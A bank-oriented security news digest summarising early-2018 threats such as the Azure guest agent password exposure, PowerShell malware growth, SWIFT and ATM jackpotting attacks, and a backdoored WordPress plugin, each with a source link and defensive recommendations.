Azure Guest Agent Design Enables Plaintext Password Theft

Researchers from Guardicore found that attackers can abuse the Microsoft Azure Guest Agent’s design to recover plaintext administrator passwords from target machines.  This flaw can be abused on any Azure machine, Windows or Linux, where the Azure reset password tool was used.  Microsoft recommends customers follow Azure security best practices to protect against this attack.  Azure users are also urged to check if they have reset password configuration files stored on their Azure machines and if so, delete them.

Relevant URL(s): https://www.darkreading.com/vulnerabilities---threats/azure-guest-agent-design-enables-plaintext-password-theft-/d/d-id/1331317

Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors

Analytic efforts between the Department of Homeland Security (DHS) and the FBI uncovered information on Russian government actions targeting U.S. Government entities and multiple other critical infrastructure sectors.  This campaign was carried out in two phases: staging and intended targets.  Initial victims were most often trusted third-party suppliers, which were used as pivot points to obtain access to their final intended victim networks.  The DHS and the FBI believe the ultimate objective is to compromise organizational networks.  Banks should update their defense systems with the indicators of compromise provided by the DHS and FBI to help identify and block this attack.

Relevant URL(s): https://www.us-cert.gov/ncas/alerts/TA18-074A

Malware Leveraging PowerShell Grew 432% in 2017

The total number of PowerShell malware samples observed in 2017 was 432% higher than that in 2016, with 267% of that increase in the fourth quarter, according to McAfee.  Attackers take advantage of PowerShell’s legitimate functionality to carry out malicious activity, such as command and control communications, credential theft, privilege escalation, and to conceal lateral movement on breached networks.  Banks can better protect its systems by ensuring network segmentation is properly implemented and disabling PowerShell throughout the organization.

Relevant URL(s): https://www.darkreading.com/vulnerabilities---threats/malware-leveraging-powershell-grew-432--in-2017/d/d-id/1331255

North Korea Threat Group Targeting Turkish Financial Orgs

McAfee reported finding malware associated with North Korean group Hidden Cobra on Turkish systems belonging to three large financial institutions and at least two major government-controlled entities in March.  The malware, Bankshot, was distributed via sophisticated phishing emails in these latest attacks.  They believe the goal was to “surveil their operations, establish functions of their processes, and ultimately compromise funds”.  Regular social engineering and phishing testing coupled with end-user awareness training can help protect against threats such as this.

Relevant URL(s): https://www.darkreading.com/attacks-breaches/north-korea-threat-group-targeting-turkish-financial-orgs/d/d-id/1331223

Threats from Mobile Ransomware & Banking Malware Are Growing

The number of unique mobile malware samples increased greatly in 2017.  Compared to the previous year, unique mobile ransomware samples increased 415%, while the number of distinct mobile banking malware samples increased by 94%.  Android is the predominant target for most malicious apps, but attackers are starting to target iOS more due to the number of potential victims.  As always, users should keep their mobile devices updated to the latest version, avoid installing apps from third-party app stores, and carefully review the permissions that apps request.  

Relevant URL(s): https://www.darkreading.com/mobile/threats-from-mobile-ransomware-and-banking-malware-are-growing-/d/d-id/1331140

SWIFT Network Used in $2 Million Heist at Indian Bank

Once again, the Society for Worldwide Interbank Financial Telecommunications (SWIFT) system was leveraged to transfer nearly $2 million through three unauthorized remittances in February.  India-based City Union Bank's SWIFT systems were hacked and leveraged to transfer the funds to accounts in Dubai, Turkey, and China.  City Union Bank is working with authorities to investigate and have found no evidence of internal staff involvement.  Multiple layers of security, such as continuous network monitoring, fraud detection solutions, and adaptive endpoint protection can help protect against threats such as this.

Relevant URL(s): https://www.reuters.com/article/us-city-union-bank-swift/indias-city-union-bank-ceo-says-suffered-cyber-hack-via-swift-system-idUSKCN1G20AF

U.S. Announces Takedown of $530 Million Cyberfraud Network

The U.S. Department of Justice recently announced one of the largest cyberfraud prosecutions it has ever undertaken.  36 individuals that were part of an international cybercrime ring were charged.  The group, called Infraud, operated like a business and allegedly stole $530 million through purchases made with pilfered and counterfeit credit card information.  Consumers can better protect themselves by monitoring account balances and activity closely and reporting potential indicators of compromise immediately. 

Relevant URL(s): https://www.paymentssource.com/articles/us-announces-take-down-of-530-million-cyberfraud-network

Criminals Obtain Code-Signing Certificates Using Stolen Corporate IDs

New research indicates that code-signing certificates are being created using stolen corporate identities.  Malware authors then use these certificates when distributing their malicious software, because most systems assume it can be trusted.  This hard-to-spot malware has been used in a wide range of attacks, such as website spoofing, data exfiltration, and man-in-the-middle attacks.  Application whitelisting technologies and sophisticated endpoint protection can help mitigate this pervasive threat.

Relevant URL(s): https://www.darkreading.com/vulnerabilities---threats/criminals-obtain-code-signing-certificates-using-stolen-corporate-ids--/d/d-id/1331113

New Zero-Day Ransomware Evades Microsoft, Google Cloud Malware Detection

A new ransomware variant, dubbed Shurl0ckr, managed to evade the built-in malware protections on Google Drive and Microsoft Office 365.  In fact, only seven percent of 67 major antivirus platforms detected it.  Shurl0ckr has been observed being distributed via drive-by downloads and phishing emails.  Using restricted accounts for day-to-day work and leveraging adaptive endpoint security solutions can limit exposure to ransomware attacks.  

Relevant URL(s): https://www.darkreading.com/cloud/new-zero-day-ransomware-evades-microsoft-google-cloud-malware-detection/d/d-id/1330999

Over 12,000 Business Websites Leveraged for Cybercrime

Researchers found that over 12,000 websites in the business category were used to deliver malware or launch cyberattacks in 2017.  Much of this is attributed to the background sites, such as ad delivery networks, that sites in the business category contact behind the scenes.  They also found that economy and business sites ran more vulnerable software, hosted more phishing sites, and experienced more security incidents than other categories in 2017.  These threats can often be mitigated with up-to-date, adaptive web security filtering solutions.  

Relevant URL(s): https://www.darkreading.com/endpoint/over-12000-business-websites-leveraged-for-cybercrime/d/d-id/1330980

First ‘Jackpotting’ Attacks Hit U.S. ATMs

ATM “jackpotting” attacks, also known as “logical attacks”, which have long been an issue for banks in Europe and Asia, are now being seen targeting ATMs in the United States.  The goal of these attacks is to force the machine to dispense large volumes of cash on demand.  To carry out the attack, crooks must gain physical access to the ATM to use specialized electronics and / or malware to control the operations of the ATM.  Banks should consider all points where ATMs could be vulnerable to physical attack, such as USB and network ports, and appropriate safeguards should be implemented.  All ATMs should also run supported operating systems.  

Relevant URL(s): https://krebsonsecurity.com/2018/01/first-jackpotting-attacks-hit-u-s-atms/

How to Protect Yourself from Meltdown and Spectre CPU Flaws

In early January, researchers disclosed two serious flaws in modern processors, Spectre and Meltdown, that could affect nearly every Intel computer released in the last 20 years, as well as the AMD and Arm chips in your phones, laptops, and tablets.  The processor manufacturers believe they can fix or mitigate the flaws with software patches, and Apple, Microsoft, and Google have already released some mitigations.  The BIOS updates released by Intel are causing some PCs to become unstable; however, software patches from operating system vendors should be applied as soon as possible to mitigate the effects of these flaws.  

Relevant URL(s): https://www.cnet.com/uk/how-to/how-to-fix-meltdown-spectre-intel-amd-arm-windows-mac-android-ios/

BEC Attacks to Exceed $9B in 2018: Trend Micro

Less than a year ago, the FBI reported that business email compromise (BEC) attacks were a $5.3 billion industry; however, Trend Micro now projects that BEC attacks will exceed $9 billion 2018.  In BEC attacks, crooks typically leverage social engineering, or they try to steal email login credentials through phishing emails or malware.  End-user awareness training is critical to prevent these types of attacks, and significant transactions should always require dual-approval and verbal verification from the requester.  

Relevant URL(s): https://www.darkreading.com/vulnerabilities---threats/bec-attacks-to-exceed-$9b-in-2018-trend-micro/d/d-id/1330853

World Economic Forum: Cyber-Attacks Third Most Likely Global Risk in 2018

According to the World Economic Forum’s 2018 Global Risk Report, cyber-attacks are the third most likely global risk this year, with data fraud or theft coming in fourth place.  This shows just how much cyber-risks have increased in their prevalence and disruptive potential as of late.  As cyber-risks continue to affect organizations in new and broader ways, risk management should be a high priority.  

Relevant URL(s): https://www.infosecurity-magazine.com/news/cyberattacks-global-risk-2018/
 

Website Glitch Let Me Overstock My Coinbase

In 2014, Overstock.com became one of the first e-commerce vendors to accept bitcoin by partnering with Coinbase.  Earlier this month, Bancsec identified a flaw with Coinbase and Overstock.com that allowed customers to purchase items at a small fraction of the listed price.  Even worse, this flaw allowed customers paying with bitcoin to receive a refund much larger than what they had paid when the order was canceled.  Coinbase has since implemented a fix to resolve the issue.  

Relevant URL(s): https://krebsonsecurity.com/2018/01/website-glitch-let-me-overstock-my-coinbase/
 

Cron-Linked Malware Impersonates 2,200 Banking Apps

Researchers have discovered a new Android malware dubbed the Catelites Bot, which shares similarities with the CronBot banking Trojan that was used to steal $900,000. This new malware is designed to harvest payment card details and banking credentials from customers of over 2,200 financial institutions. Android users should avoid installing apps from third-party app sources and should always carefully review the permissions that apps request.

Relevant URL(s): https://www.infosecurity-magazine.com/news/cronlinked-malware-impersonates/

Researchers Find Trove of 1.4 Billion Breached Credentials

An aggregated, interactive database of over 1.4 billion breached credentials was recently discovered on the dark web. This list, which includes decrypted passwords from known breaches such as LinkedIn and Bitcoin, is nearly twice as big as the previous largest discovered. Multi-factor authentication can help mitigate account takeover attempts, and passwords should never be reused across multiple services. 

Relevant URL(s): https://www.infosecurity-magazine.com/news/researchers-trove-14-billion/

Hidden Backdoor Found In WordPress Captcha Plugin Affects Over 300,000 Sites

An undisclosed buyer purchased a Captcha WordPress plugin that had more than 300,000 active installations from developer BestWebSoft, then modified it to download and install a hidden backdoor. This backdoor allowed the plugin author or other attackers to gain remote administrative access to WordPress sites without requiring any authentication. WordPress removed the affected Captcha plugin from its official plugin store. Website administrators are urged to replace this plugin with the latest official Captcha version to mitigate this threat. 

Relevant URL(s): https://thehackernews.com/2017/12/wordpress-security-plugin.html

Microsoft Office Docs New Vessel for Loki Malware

A new attack has been identified that delivers Loki malware through malicious “scriptlets” in Microsoft Office applications. These “scriptlets, which utilize external links embedded in the documents, often bypass traditional antivirus because they show no evidence of shellcode, macros, or DDE functionality. Loki is a type of malware designed to steal usernames and passwords from email clients, browsers, FTP clients, and file management software. This attack exploits a vulnerability that was patched in April and updated in September of 2017. Banks should always ensure critical security vulnerabilities are patched as promptly as possible to protect against threats such as this. 

Relevant URL(s): https://www.darkreading.com/attacks-breaches/microsoft-office-docs-new-vessel-for-loki-malware/d/d-id/1330678

Massive Cloud Leak Exposes Alteryx, Experian, US Census Bureau Data

A substantial data leak that was the result of a misconfigured Amazon Web Services S3 storage bucket exposed the sensitive data of 123 million American households in December. This leaked data contained information from analytics firm Alteryx and its partners Experian and the US Census Bureau and included details on financial histories, contact information, and mortgage ownership. To limit risk, banks should probe the security culture and controls of their third-party vendors and ensure they meet expectations. 

Relevant URL(s): https://www.darkreading.com/cloud/massive-cloud-leak-exposes-alteryx-experian-us-census-bureau-data/d/d-id/1330673